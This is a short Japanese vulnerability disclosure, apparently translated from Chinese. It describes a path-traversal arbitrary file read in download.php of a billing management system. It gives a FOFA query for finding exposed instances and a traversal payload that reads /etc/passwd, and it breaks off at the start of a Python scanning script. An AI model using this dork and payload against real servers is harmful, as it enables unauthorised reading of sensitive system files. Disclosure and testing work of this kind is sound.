声明
この記事に記載されている関連テクノロジーを違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身の責任となります。記事の著者は無関係です。この記事は教育のみを目的としています。
1. 脆弱性の説明
Blue Ocean Excellent Accounting Management Systemdownload.php
ファイルには任意のファイルを読み取る脆弱性があり、攻撃者は .../ ディレクトリをトラバースすることでサーバー上の機密ファイルを読み取ることができます。
2. 脆弱性の再発
脆弱性キーワード検索
FOFA:title =="蓝海卓越计费管理系统"
脆弱性箇所:download.php?file=../../../../../etc/passwd
スクリプト検出
# -*- coding: utf-8 -*-
import argparse
import sys
import requests
from multiprocessing.dummy import Pool # 表示的是多线程
reque